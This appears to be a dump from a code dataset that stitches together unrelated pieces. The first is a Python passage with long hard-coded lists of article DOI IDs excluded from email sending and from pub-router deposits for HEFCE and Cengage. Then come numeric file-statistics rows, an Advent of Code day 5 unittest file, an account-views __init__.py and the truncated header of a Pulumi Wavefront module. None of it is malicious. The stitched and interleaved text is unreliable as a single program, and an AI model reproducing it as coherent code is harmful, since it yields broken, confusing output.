        "03468", "03473", "03475", "03476", "03487", "03496", "03497", "03498", "03502", "03504",
        "03521", "03522", "03523", "03526", "03528", "03532", "03542", "03545", "03549", "03553",
        "03558", "03563", "03564", "03568", "03573", "03574", "03575", "03579", "03581", "03582",
        "03583", "03587", "03596", "03600", "03602", "03604", "03606", "03609", "03613", "03626",
        "03635", "03638", "03640", "03641", "03648", "03650", "03653", "03656", "03658", "03663",
        "03665", "03671", "03674", "03676", "03678", "03679", "03680", "03683", "03695", "03696",
        "03697", "03701", "03702", "03703", "03706", "03711", "03714", "03720", "03722", "03724",
        "03726", "03727", "03728", "03735", "03737", "03743", "03751", "03753", "03754", "03756",
        "03764", "03765", "03766", "03772", "03778", "03779", "03781", "03785", "03790", "03804",
        "03811", "03819", "03821", "03830", "03842", "03848", "03851", "03868", "03881", "03883",
        "03891", "03892", "03895", "03896", "03908", "03915", "03925", "03939", "03941", "03943",
        "03949", "03952", "03962", "03970", "03971", "03977", "03978", "03980", "03981", "03997",
        "04000", "04006", "04008", "04014", "04024", "04034", "04037", "04040", "04046", "04047",
        "04057", "04059", "04066", "04069", "04070", "04094", "04105", "04106", "04111", "04114",
        "04120", "04121", "04123", "04126", "04132", "04135", "04137", "04147", "04158", "04165",
        "04168", "04177", "04180", "04187", "04193", "04205", "04207", "04220", "04234", "04235",
        "04236", "04246", "04247", "04249", "04251", "04263", "04265", "04266", "04273", "04279",
        "04287", "04288", "04300", "04316", "04333", "04353", "04363", "04366", "04371", "04378",
        "04380", "04387", "04389", "04390", "04395", "04402", "04406", "04415", "04418", "04433",
        "04437", "04449", "04476", "04478", "04489", "04491", "04494", "04499", "04501", "04506",
        "04517", "04525", "04530", "04531", "04534", "04543", "04551", "04553", "04563", "04565",
        "04577", "04580", "04581", "04586", "04591", "04600", "04601", "04603", "04605", "04617",
        "04629", "04630", "04631", "04645", "04660", "04664", "04686", "04692", "04693", "04711",
        "04729", "04741", "04742", "04766", "04775", "04779", "04785", "04801", "04806", "04811",
        "04851", "04854", "04869", "04875", "04876", "04878", "04885", "04889", "04901", "04902",
        "04909", "04919", "04969", "04970", "04986", "04995", "04996", "04997", "04998", "05000",
        "05007", "05025", "05031", "05033", "05041", "05048", "05055", "05060", "05075", "05087",
        "05105", "05115", "05116", "05125", "05151", "05161", "05169", "05178", "05179", "05198",
        "05216", "05218", "05244", "05256", "05259", "05269", "05289", "05290", "05334", "05352",
        "05375", "05377", "05394", "05401", "05418", "05419", "05422", "05427", "05438", "05490",
        "05504", "05508", "05553", "05558", "05564", "05570", "05580", "05597", "05614", "05657",
        "05663", "05720", "05770", "05787", "05789", "05816", "05846", "05896", "05983", "06156",
        "06193", "06200", "06235", "06303", "06306", "06351", "06424", "06430", "06453", "06494",
        "06656", "06720", "06740", "06900", "06986"]
    # More do not send circa July 2015
    # Do not send email if they are revised, since the duplicate check will not
    # trigger since they were not sent in the first place
    do_not_send_list = do_not_send_list + ["04186", "06416", "06847", "06938", "06959", "07072"]
    return do_not_send_list
def pub_router_deposit_article_blacklist(workflow):
    """
    Return the hard-coded blacklist of article DOI ids that must not be
    deposited for the given pub-router *workflow*.

    :param workflow: workflow name, e.g. "HEFCE", "Cengage" or "GoOA"
    :returns: list of 5-digit DOI id strings; empty for "GoOA" and for any
        unrecognised workflow name
    """
    # NOTE(review): the id lists below are frozen historical data; their
    # provenance is not recorded here -- presumably articles already
    # delivered to each destination. Confirm before pruning or editing.
    if workflow == "HEFCE":
        article_blacklist = [
            "00003", "00005", "00007", "00011", "00013",
            "00031", "00047", "00048", "00049", "00051",
            "00065", "00067", "00068", "00070", "00078",
            "00090", "00093", "00102", "00109", "00117",
            "00171", "00173", "00181", "00184", "00205",
            "00240", "00242", "00243", "00248", "00270",
            "00281", "00286", "00301", "00302", "00311",
            "00326", "00340", "00347", "00351", "00352",
            "00353", "00365", "00385", "00386", "00387",
            "00475", "00012", "00036", "00105", "00116",
            "00133", "00160", "00170", "00178", "00183",
            "00190", "00218", "00220", "00230", "00231",
            "00247", "00260", "00269", "00278", "00288",
            "00290", "00291", "00299", "00306", "00308",
            "00312", "00321", "00324", "00327", "00329",
            "00333", "00334", "00336", "00337", "00348",
            "00354", "00358", "00362", "00367", "00378",
            "00380", "00400", "00411", "00415", "00421",
            "00422", "00425", "00426", "00429", "00435",
            "00444", "00450", "00452", "00458", "00459",
            "00461", "00467", "00471", "00473", "00476",
            "00477", "00481", "00482", "00488", "00491",
            "00498", "00499", "00505", "00508", "00515",
            "00518", "00522", "00523", "00533", "00534",
            "00537", "00542", "00558", "00563", "00565",
            "00569", "00571", "00572", "00573", "00577",
            "00592", "00593", "00594", "00603", "00605",
            "00615", "00625", "00626", "00631", "00632",
            "00633", "00638", "00639", "00640", "00641",
            "00642", "00646", "00647", "00648", "00654",
            "00655", "00658", "00659", "00663", "00666",
            "00668", "00669", "00672", "00675", "00676",
            "00683", "00691", "00692", "00699", "00704",
            "00708", "00710", "00712", "00723", "00726",
            "00729", "00731", "00736", "00744", "00745",
            "00747", "00750", "00757", "00759", "00762",
            "00767", "00768", "00772", "00776", "00778",
            "00780", "00782", "00785", "00790", "00791",
            "00792", "00799", "00800", "00801", "00802",
            "00804", "00806", "00808", "00813", "00822",
            "00824", "00825", "00828", "00842", "00844",
            "00845", "00855", "00856", "00857", "00861",
            "00862", "00863", "00866", "00868", "00873",
            "00882", "00884", "00886", "00895", "00899",
            "00903", "00905", "00914", "00924", "00926",
            "00932", "00933", "00940", "00943", "00947",
            "00948", "00951", "00953", "00954", "00958",
            "00960", "00961", "00963", "00966", "00967",
            "00969", "00971", "00983", "00992", "00994",
            "00996", "00999", "01004", "01008", "01009",
            "01020", "01029", "01030", "01042", "01045",
            "01061", "01064", "01067", "01071", "01074",
            "01084", "01085", "01086", "01089", "01096",
            "01098", "01102", "01104", "01108", "01114",
            "01115", "01119", "01120", "01123", "01127",
            "01133", "01135", "01136", "01138", "01139",
            "01140", "01149", "01157", "01159", "01160",
            "01169", "01179", "01180", "01197", "01202",
            "01206", "01211", "01213", "01214", "01221",
            "01222", "01228", "01229", "01233", "01234",
            "01236", "01252", "01256", "01270", "01273",
            "01279", "01287", "01289", "01291", "01293",
            "01294", "01295", "01296", "01298", "01299",
            "01305", "01312", "01319", "01323", "01326",
            "01328", "01339", "01340", "01341", "01345",
            "01350", "01387", "01388", "01402", "01403",
            "01414", "01426", "01428", "01456", "01462",
            "01469", "01482", "01494", "01501", "01503",
            "01514", "01515", "01516", "01519", "01541",
            "01557", "01561", "01574", "01587", "01597",
            "01599", "01605", "01608", "01633", "01658",
            "01662", "01663", "01680", "01700", "01710",
            "01738", "01749", "01760", "01779", "01809",
            "01816", "01820", "01839", "01845", "01873",
            "01893", "01926", "01968", "01979", "02094",
            "00590", "00662", "00829", "01201", "01239",
            "01257", "01267", "01308", "01310", "01311",
            "01322", "01355", "01369", "01370", "01374",
            "01381", "01385", "01386", "01412", "01433",
            "01434", "01438", "01439", "01440", "01457",
            "01460", "01465", "01473", "01479", "01481",
            "01483", "01488", "01489", "01496", "01498",
            "01524", "01530", "01535", "01539", "01566",
            "01567", "01569", "01579", "01581", "01584",
            "01596", "01603", "01604", "01607", "01610",
            "01612", "01621", "01623", "01630", "01632",
            "01637", "01641", "01659", "01671", "01681",
            "01684", "01694", "01695", "01699", "01715",
            "01724", "01730", "01739", "01741", "01751",
            "01754", "01763", "01775", "01776", "01808",
            "01812", "01817", "01828", "01831", "01832",
            "01833", "01834", "01846", "01849", "01856",
            "01857", "01861", "01867", "01879", "01883",
            "01888", "01892", "01901", "01906", "01911",
            "01913", "01914", "01916", "01917", "01928",
            "01936", "01939", "01944", "01948", "01949",
            "01958", "01963", "01964", "01967", "01977",
            "01982", "01990", "01993", "01998", "02001",
            "02008", "02009", "02020", "02024", "02025",
            "02028", "02030", "02040", "02041", "02042",
            "02043", "02046", "02053", "02057", "02061",
            "02062", "02069", "02076", "02077", "02078",
            "02087", "02088", "02104", "02105", "02109",
            "02112", "02115", "02130", "02131", "02137",
            "02148", "02151", "02152", "02164", "02171",
            "02172", "02181", "02184", "02189", "02190",
            "02196", "02199", "02200", "02203", "02206",
            "02208", "02217", "02218", "02224", "02230",
            "02236", "02238", "02242", "02245", "02252",
            "02257", "02260", "02265", "02270", "02272",
            "02273", "02277", "02283", "02286", "02289",
            "02304", "02313", "02322", "02324", "02349",
            "02362", "02365", "02369", "02370", "02372",
            "02375", "02384", "02386", "02387", "02391",
            "02394", "02395", "02397", "02403", "02407",
            "02409", "02419", "02439", "02440", "02443",
            "02444", "02445", "02450", "02451", "02475",
            "02478", "02481", "02482", "02490", "02501",
            "02504", "02510", "02511", "02515", "02516",
            "02517", "02523", "02525", "02531", "02535",
            "02536", "02555", "02557", "02559", "02564",
            "02565", "02576", "02583", "02589", "02590",
            "02598", "02615", "02618", "02619", "02626",
            "02630", "02634", "02637", "02641", "02653",
            "02658", "02663", "02667", "02669", "02670",
            "02671", "02674", "02676", "02678", "02687",
            "02715", "02725", "02726", "02730", "02734",
            "02736", "02740", "02743", "02747", "02750",
            "02755", "02758", "02763", "02772", "02777",
            "02780", "02784", "02786", "02791", "02792",
            "02798", "02805", "02809", "02811", "02812",
            "02813", "02833", "02839", "02840", "02844",
            "02848", "02851", "02854", "02860", "02862",
            "02863", "02866", "02869", "02872", "02875",
            "02882", "02893", "02897", "02904", "02907",
            "02910", "02917", "02923", "02935", "02938",
            "02945", "02949", "02950", "02951", "02956",
            "02963", "02964", "02975", "02978", "02981",
            "02993", "02996", "02999", "03005", "03007",
            "03011", "03023", "03025", "03031", "03032",
            "03035", "03043", "03058", "03061", "03068",
            "03069", "03075", "03077", "03080", "03083",
            "03091", "03100", "03104", "03110", "03115",
            "03116", "03125", "03126", "03128", "03145",
            "03146", "03159", "03164", "03176", "03178",
            "03180", "03185", "03191", "03197", "03198",
            "03205", "03206", "03222", "03229", "03233",
            "03235", "03239", "03245", "03251", "03254",
            "03255", "03271", "03273", "03275", "03282",
            "03285", "03293", "03297", "03300", "03307",
            "03311", "03318", "03342", "03346", "03348",
            "03351", "03357", "03363", "03371", "03372",
            "03374", "03375", "03383", "03385", "03397",
            "03398", "03399", "03401", "03405", "03406",
            "03416", "03421", "03422", "03427", "03430",
            "03433", "03435", "03440", "03443", "03445",
            "03464", "03467", "03468", "03473", "03475",
            "03476", "03487", "03496", "03497", "03498",
            "03502", "03504", "03521", "03522", "03523",
            "03526", "03528", "03532", "03542", "03545",
            "03549", "03553", "03558", "03563", "03564",
            "03568", "03573", "03574", "03575", "03579",
            "03581", "03582", "03583", "03587", "03596",
            "03600", "03602", "03604", "03606", "03609",
            "03613", "03626", "03635", "03638", "03640",
            "03641", "03648", "03650", "03653", "03656",
            "03658", "03663", "03665", "03671", "03674",
            "03676", "03678", "03679", "03680", "03683",
            "03695", "03696", "03697", "03701", "03702",
            "03703", "03706", "03711", "03714", "03720",
            "03722", "03724", "03726", "03727", "03728",
            "03735", "03737", "03743", "03751", "03753",
            "03754", "03756", "03764", "03765", "03766",
            "03772", "03778", "03779", "03781", "03785",
            "03790", "03804", "03811", "03819", "03821",
            "03830", "03842", "03848", "03851", "03868",
            "03881", "03883", "03891", "03892", "03895",
            "03896", "03908", "03915", "03925", "03939",
            "03941", "03943", "03949", "03952", "03962",
            "03970", "03971", "03977", "03978", "03980",
            "03981", "03997", "04000", "04006", "04008",
            "04014", "04024", "04034", "04037", "04040",
            "04046", "04047", "04057", "04059", "04066",
            "04069", "04070", "04094", "04105", "04106",
            "04111", "04114", "04120", "04121", "04123",
            "04126", "04132", "04135", "04137", "04147",
            "04158", "04165", "04168", "04177", "04180",
            "04187", "04193", "04205", "04207", "04220",
            "04234", "04235", "04236", "04246", "04247",
            "04249", "04251", "04263", "04265", "04266",
            "04273", "04279", "04287", "04288", "04300",
            "04316", "04333", "04353", "04363", "04366",
            "04371", "04378", "04380", "04387", "04389",
            "04390", "04395", "04402", "04406", "04407",
            "04415", "04418", "04433", "04437", "04449",
            "04476", "04478", "04489", "04491", "04494",
            "04499", "04501", "04506", "04517", "04525",
            "04530", "04531", "04534", "04543", "04551",
            "04553", "04563", "04565", "04577", "04580",
            "04581", "04586", "04591", "04600", "04601",
            "04603", "04605", "04617", "04629", "04630",
            "04631", "04645", "04660", "04664", "04686",
            "04692", "04693", "04711", "04729", "04741",
            "04742", "04766", "04775", "04779", "04785",
            "04801", "04806", "04811", "04851", "04854",
            "04869", "04875", "04876", "04878", "04885",
            "04889", "04901", "04902", "04909", "04919",
            "04969", "04970", "04986", "04995", "04996",
            "04997", "04998", "05000", "05007", "05025",
            "05031", "05033", "05041", "05048", "05055",
            "05060", "05075", "05087", "05105", "05115",
            "05116", "05125", "05151", "05161", "05169",
            "05178", "05179", "05198", "05216", "05218",
            "05244", "05256", "05259", "05269", "05289",
            "05290", "05334", "05352", "05375", "05377",
            "05394", "05401", "05418", "05419", "05422",
            "05427", "05438", "05490", "05504", "05508",
            "05553", "05558", "05564", "05570", "05580",
            "05597", "05614", "05657", "05663", "05720",
            "05770", "05787", "05789", "05816", "05846",
            "05896", "05983", "06156", "06193", "06200",
            "06235", "06303", "06306", "06351", "06424",
            "06430", "06453", "06494", "06656", "06720",
            "06740", "06900", "06986"]
    elif workflow == "Cengage":
        article_blacklist = [
            "00003", "00005", "00007", "00011", "00012", "00013", "00031", "00036", "00047",
            "00048", "00049", "00051", "00065", "00067", "00068", "00070", "00078", "00090",
            "00093", "00102", "00105", "00109", "00116", "00117", "00133", "00160", "00170",
            "00171", "00173", "00178", "00181", "00183", "00184", "00190", "00205", "00218",
            "00220", "00230", "00231", "00240", "00242", "00243", "00247", "00248", "00260",
            "00269", "00270", "00278", "00281", "00286", "00288", "00290", "00291", "00299",
            "00301", "00302", "00306", "00308", "00311", "00312", "00321", "00324", "00326",
            "00327", "00329", "00333", "00334", "00336", "00337", "00340", "00347", "00348",
            "00351", "00352", "00353", "00354", "00358", "00362", "00365", "00367", "00378",
            "00380", "00385", "00386", "00387", "00400", "00411", "00415", "00421", "00422",
            "00425", "00426", "00429", "00435", "00444", "00450", "00452", "00458", "00459",
            "00461", "00467", "00471", "00473", "00475", "00476", "00477", "00481", "00482",
            "00488", "00491", "00498", "00499", "00505", "00508", "00515", "00518", "00522",
            "00523", "00533", "00534", "00537", "00542", "00558", "00563", "00565", "00569",
            "00571", "00572", "00573", "00577", "00590", "00592", "00593", "00594", "00603",
            "00605", "00615", "00625", "00626", "00631", "00632", "00633", "00638", "00639",
            "00640", "00641", "00642", "00646", "00647", "00648", "00654", "00655", "00658",
            "00659", "00662", "00663", "00666", "00668", "00669", "00672", "00675", "00676",
            "00683", "00691", "00692", "00699", "00704", "00708", "00710", "00712", "00723",
            "00726", "00729", "00731", "00736", "00744", "00745", "00747", "00750", "00757",
            "00759", "00762", "00767", "00768", "00772", "00776", "00778", "00780", "00782",
            "00785", "00790", "00791", "00792", "00799", "00800", "00801", "00802", "00804",
            "00806", "00808", "00813", "00822", "00824", "00825", "00828", "00829", "00842",
            "00844", "00845", "00855", "00856", "00857", "00861", "00862", "00863", "00866",
            "00868", "00873", "00882", "00884", "00886", "00895", "00899", "00903", "00905",
            "00914", "00924", "00926", "00932", "00933", "00940", "00943", "00947", "00948",
            "00951", "00953", "00954", "00958", "00960", "00961", "00963", "00966", "00967",
            "00969", "00971", "00983", "00992", "00994", "00996", "00999", "01004", "01008",
            "01009", "01020", "01029", "01030", "01042", "01045", "01061", "01064", "01067",
            "01071", "01074", "01084", "01085", "01086", "01089", "01096", "01098", "01102",
            "01104", "01108", "01114", "01115", "01119", "01120", "01123", "01127", "01133",
            "01135", "01136", "01138", "01139", "01140", "01149", "01157", "01159", "01160",
            "01169", "01179", "01180", "01197", "01201", "01202", "01206", "01211", "01213",
            "01214", "01221", "01222", "01228", "01229", "01233", "01234", "01236", "01239",
            "01252", "01256", "01257", "01267", "01270", "01273", "01279", "01287", "01289",
            "01291", "01293", "01294", "01295", "01296", "01298", "01299", "01305", "01308",
            "01310", "01311", "01312", "01319", "01322", "01323", "01326", "01328", "01339",
            "01340", "01341", "01345", "01350", "01355", "01369", "01370", "01374", "01381",
            "01385", "01386", "01387", "01388", "01402", "01403", "01412", "01414", "01426",
            "01428", "01433", "01434", "01438", "01439", "01440", "01456", "01457", "01460",
            "01462", "01465", "01469", "01473", "01479", "01481", "01482", "01483", "01488",
            "01489", "01494", "01496", "01498", "01501", "01503", "01514", "01515", "01516",
            "01519", "01524", "01530", "01535", "01539", "01541", "01557", "01561", "01566",
            "01567", "01569", "01574", "01579", "01581", "01584", "01587", "01596", "01597",
            "01599", "01603", "01604", "01605", "01607", "01608", "01610", "01612", "01621",
            "01623", "01630", "01632", "01633", "01637", "01641", "01658", "01659", "01662",
            "01663", "01671", "01680", "01681", "01684", "01694", "01695", "01699", "01700",
            "01710", "01715", "01724", "01730", "01738", "01739", "01741", "01749", "01751",
            "01754", "01760", "01763", "01775", "01776", "01779", "01808", "01809", "01812",
            "01816", "01817", "01820", "01828", "01831", "01832", "01833", "01834", "01839",
            "01845", "01846", "01849", "01856", "01857", "01861", "01867", "01873", "01879",
            "01883", "01888", "01892", "01893", "01901", "01906", "01911", "01913", "01914",
            "01916", "01917", "01926", "01928", "01936", "01939", "01944", "01948", "01949",
            "01958", "01963", "01964", "01967", "01968", "01977", "01979", "01982", "01990",
            "01993", "01998", "02001", "02008", "02009", "02020", "02024", "02025", "02028",
            "02030", "02040", "02041", "02042", "02043", "02046", "02053", "02057", "02061",
            "02062", "02069", "02076", "02077", "02078", "02087", "02088", "02094", "02104",
            "02105", "02109", "02112", "02115", "02130", "02131", "02137", "02148", "02151",
            "02152", "02164", "02171", "02172", "02181", "02184", "02189", "02190", "02196",
            "02199", "02200", "02203", "02206", "02208", "02217", "02218", "02224", "02230",
            "02236", "02238", "02242", "02245", "02252", "02257", "02260", "02265", "02270",
            "02272", "02273", "02277", "02283", "02286", "02289", "02304", "02313", "02322",
            "02324", "02349", "02362", "02365", "02369", "02370", "02372", "02375", "02384",
            "02386", "02387", "02391", "02394", "02395", "02397", "02403", "02407", "02409",
            "02419", "02439", "02440", "02443", "02444", "02445", "02450", "02451", "02475",
            "02478", "02481", "02482", "02490", "02501", "02504", "02510", "02511", "02515",
            "02516", "02517", "02523", "02525", "02531", "02535", "02536", "02555", "02557",
            "02559", "02564", "02565", "02576", "02583", "02589", "02590", "02598", "02615",
            "02618", "02619", "02626", "02630", "02634", "02637", "02641", "02653", "02658",
            "02663", "02667", "02669", "02670", "02671", "02674", "02676", "02678", "02687",
            "02715", "02725", "02726", "02730", "02734", "02736", "02740", "02743", "02747",
            "02750", "02755", "02758", "02763", "02772", "02777", "02780", "02784", "02786",
            "02791", "02792", "02798", "02805", "02809", "02811", "02812", "02813", "02833",
            "02839", "02840", "02844", "02848", "02851", "02854", "02860", "02862", "02863",
            "02866", "02869", "02872", "02875", "02882", "02893", "02897", "02904", "02907",
            "02910", "02917", "02923", "02935", "02938", "02945", "02948", "02949", "02950",
            "02951", "02956", "02963", "02964", "02975", "02978", "02981", "02993", "02996",
            "02999", "03005", "03007", "03011", "03023", "03025", "03031", "03032", "03035",
            "03043", "03058", "03061", "03068", "03069", "03075", "03077", "03080", "03083",
            "03091", "03100", "03104", "03110", "03115", "03116", "03125", "03126", "03128",
            "03145", "03146", "03159", "03164", "03176", "03178", "03180", "03185", "03189",
            "03191", "03197", "03198", "03205", "03206", "03222", "03229", "03233", "03235",
            "03239", "03245", "03251", "03254", "03255", "03256", "03270", "03271", "03273",
            "03275", "03282", "03285", "03293", "03297", "03300", "03307", "03311", "03318",
            "03342", "03346", "03348", "03351", "03357", "03363", "03371", "03372", "03374",
            "03375", "03383", "03385", "03397", "03398", "03399", "03401", "03405", "03406",
            "03416", "03421", "03422", "03427", "03430", "03433", "03435", "03440", "03443",
            "03445", "03464", "03467", "03468", "03473", "03475", "03476", "03487", "03496",
            "03497", "03498", "03502", "03504", "03521", "03522", "03523", "03526", "03528",
            "03532", "03542", "03545", "03549", "03553", "03558", "03563", "03564", "03568",
            "03573", "03574", "03575", "03579", "03581", "03582", "03583", "03587", "03596",
            "03600", "03602", "03604", "03606", "03609", "03613", "03614", "03626", "03635",
            "03638", "03640", "03641", "03648", "03650", "03653", "03656", "03658", "03663",
            "03665", "03671", "03674", "03676", "03678", "03679", "03680", "03683", "03695",
            "03696", "03697", "03701", "03702", "03703", "03706", "03711", "03714", "03720",
            "03722", "03724", "03726", "03727", "03728", "03735", "03737", "03743", "03751",
            "03753", "03754", "03756", "03764", "03765", "03766", "03772", "03778", "03779",
            "03781", "03785", "03790", "03804", "03811", "03819", "03821", "03830", "03842",
            "03848", "03851", "03868", "03881", "03883", "03891", "03892", "03895", "03896",
            "03908", "03915", "03925", "03939", "03941", "03943", "03949", "03952", "03962",
            "03970", "03971", "03977", "03978", "03980", "03981", "03997", "04000", "04006",
            "04008", "04014", "04024", "04034", "04037", "04040", "04046", "04047", "04052",
            "04057", "04059", "04066", "04069", "04070", "04094", "04105", "04106", "04111",
            "04114", "04120", "04121", "04123", "04126", "04132", "04135", "04137", "04147",
            "04158", "04165", "04168", "04177", "04180", "04186", "04187", "04193", "04205",
            "04207", "04220", "04232", "04234", "04235", "04236", "04246", "04247", "04249",
            "04251", "04260", "04263", "04265", "04266", "04273", "04279", "04287", "04288",
            "04300", "04316", "04333", "04346", "04353", "04363", "04366", "04371", "04378",
            "04379", "04380", "04387", "04389", "04390", "04395", "04402", "04406", "04407",
            "04415", "04418", "04433", "04437", "04449", "04463", "04476", "04478", "04489",
            "04490", "04491", "04494", "04499", "04501", "04506", "04517", "04525", "04530",
            "04531", "04534", "04535", "04543", "04550", "04551", "04553", "04563", "04565",
            "04577", "04580", "04581", "04585", "04586", "04591", "04599", "04600", "04601",
            "04603", "04605", "04617", "04629", "04630", "04631", "04634", "04645", "04660",
            "04664", "04686", "04692", "04693", "04711", "04726", "04729", "04741", "04742",
            "04766", "04775", "04779", "04785", "04790", "04801", "04803", "04806", "04811",
            "04837", "04851", "04854", "04869", "04871", "04872", "04875", "04876", "04878",
            "04883", "04885", "04889", "04901", "04902", "04909", "04919", "04940", "04953",
            "04960", "04969", "04970", "04979", "04986", "04995", "04996", "04997", "04998",
            "05000", "05003", "05007", "05025", "05031", "05033", "05041", "05042", "05048",
            "05055", "05060", "05075", "05087", "05098", "05105", "05115", "05116", "05118",
            "05125", "05151", "05154", "05161", "05165", "05166", "05169", "05178", "05179",
            "05198", "05216", "05218", "05224", "05242", "05244", "05256", "05259", "05269",
            "05279", "05289", "05290", "05291", "05334", "05338", "05352", "05375", "05377",
            "05378", "05394", "05401", "05413", "05418", "05419", "05421", "05422", "05423",
            "05427", "05438", "05447", "05449", "05457", "05463", "05464", "05472", "05477",
            "05490", "05491", "05503", "05504", "05508", "05534", "05544", "05553", "05557",
            "05558", "05560", "05564", "05570", "05580", "05597", "05604", "05606", "05608",
            "05614", "05635", "05657", "05663", "05701", "05720", "05733", "05770", "05787",
            "05789", "05808", "05816", "05826", "05835", "05846", "05849", "05861", "05868",
            "05871", "05875", "05896", "05899", "05959", "05983", "06003", "06024", "06034",
            "06054", "06068", "06074", "06100", "06132", "06156", "06166", "06179", "06184",
            "06193", "06200", "06235", "06250", "06303", "06306", "06346", "06351", "06369",
            "06380", "06400", "06412", "06424", "06430", "06453", "06494", "06536", "06557",
            "06565", "06633", "06656", "06717", "06720", "06740", "06758", "06782", "06808",
            "06837", "06877", "06883", "06900", "06956", "06986", "06995", "07074", "07083",
            "07108", "07157", "07204", "07239", "07322", "07364", "07390", "07431", "07482",
            "07527", "07532", "07586", "07604"
            ]
    elif workflow == "GoOA":
        # GoOA currently excludes nothing.
        article_blacklist = []
    else:
        # Unknown workflow name: nothing blacklisted.
        article_blacklist = []
    return article_blacklist
| 73.40275
| 97
| 0.48006
| 3,585
| 37,362
| 4.995537
| 0.359275
| 0.002513
| 0.004523
| 0.003629
| 0.872355
| 0.862583
| 0.847954
| 0.836228
| 0.831761
| 0.828075
| 0
| 0.611617
| 0.239254
| 37,362
| 508
| 98
| 73.547244
| 0.018471
| 0.008244
| 0
| 0.00818
| 0
| 0
| 0.469959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00409
| false
| 0
| 0
| 0
| 0.00818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
acc9e27950321a8c093397fb1f1f1fa98bac3e8d
| 599
|
py
|
Python
|
day5/test_day5.py
|
chrisb87/advent_of_code_2016
|
668a7c5e3f2aac036dcf0091ca62a47cb0c54ba8
|
[
"Unlicense"
] | 1
|
2016-12-07T20:28:12.000Z
|
2016-12-07T20:28:12.000Z
|
day5/test_day5.py
|
chrisb87/advent_of_code_2016
|
668a7c5e3f2aac036dcf0091ca62a47cb0c54ba8
|
[
"Unlicense"
] | null | null | null |
day5/test_day5.py
|
chrisb87/advent_of_code_2016
|
668a7c5e3f2aac036dcf0091ca62a47cb0c54ba8
|
[
"Unlicense"
] | null | null | null |
import unittest
from day5 import *
class TestDay5Part1(unittest.TestCase):
    """Regression tests for compute_code() (part 1, from the day5 module)."""

    @unittest.skip("slow")
    def test_compute_code_example_input(self):
        """Worked example from the puzzle statement."""
        expected = '18f47a30'
        self.assertEqual(compute_code('abc'), expected)

    @unittest.skip("slow")
    def test_compute_code_actual(self):
        """Known-good code for the real puzzle input."""
        expected = 'c6697b55'
        self.assertEqual(compute_code('ffykfhsq'), expected)
class TestDay5Part2(unittest.TestCase):
    """Regression tests for compute_code_2() (part 2, from the day5 module)."""

    @unittest.skip("slow")
    def test_compute_code_example_input(self):
        """Worked example from the puzzle statement."""
        expected = '05ace8e3'
        self.assertEqual(compute_code_2('abc'), expected)

    @unittest.skip("slow")
    def test_compute_code_actual(self):
        """Known-good code for the real puzzle input."""
        expected = '8c35d1ab'
        self.assertEqual(compute_code_2('ffykfhsq'), expected)
| 28.52381
| 58
| 0.774624
| 77
| 599
| 5.766234
| 0.337662
| 0.198198
| 0.144144
| 0.171171
| 0.734234
| 0.734234
| 0.72973
| 0.72973
| 0.72973
| 0.72973
| 0
| 0.04918
| 0.083472
| 599
| 20
| 59
| 29.95
| 0.759563
| 0
| 0
| 0.5
| 0
| 0
| 0.116861
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| false
| 0
| 0.125
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acdc88402edc131a208f4f50e53e77929a305622
| 145
|
py
|
Python
|
src/accounts/Views/__init__.py
|
samrika25/TRAVIS_HEROKU_GIT
|
bcae6d0422d9a0369810944a91dd03db7df0d058
|
[
"MIT"
] | null | null | null |
src/accounts/Views/__init__.py
|
samrika25/TRAVIS_HEROKU_GIT
|
bcae6d0422d9a0369810944a91dd03db7df0d058
|
[
"MIT"
] | 4
|
2021-03-30T12:35:36.000Z
|
2021-06-10T18:11:24.000Z
|
src/accounts/Views/__init__.py
|
samrika25/TRAVIS_HEROKU_GIT
|
bcae6d0422d9a0369810944a91dd03db7df0d058
|
[
"MIT"
] | 2
|
2021-02-07T16:16:36.000Z
|
2021-07-13T05:26:51.000Z
|
from .LogoutView import *
from .LoginView import *
from .RegisterView import *
from .ResetPasswordView import *
from .ChangePasswordView import *
| 29
| 33
| 0.8
| 15
| 145
| 7.733333
| 0.466667
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131034
| 145
| 5
| 33
| 29
| 0.920635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ace06146409e531320decade0df4e312ca2d39b1
| 23,531
|
py
|
Python
|
sdk/python/pulumi_wavefront/cloud_integration_gcp_billing.py
|
pulumi/pulumi-wavefront
|
1d199d386ee241fa2ef94553e6cae1359ec9ccf6
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-02-20T09:48:33.000Z
|
2022-02-20T09:48:33.000Z
|
sdk/python/pulumi_wavefront/cloud_integration_gcp_billing.py
|
pulumi/pulumi-wavefront
|
1d199d386ee241fa2ef94553e6cae1359ec9ccf6
|
[
"ECL-2.0",
"Apache-2.0"
] | 40
|
2020-08-12T08:37:24.000Z
|
2022-03-31T15:51:17.000Z
|
sdk/python/pulumi_wavefront/cloud_integration_gcp_billing.py
|
pulumi/pulumi-wavefront
|
1d199d386ee241fa2ef94553e6cae1359ec9ccf6
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
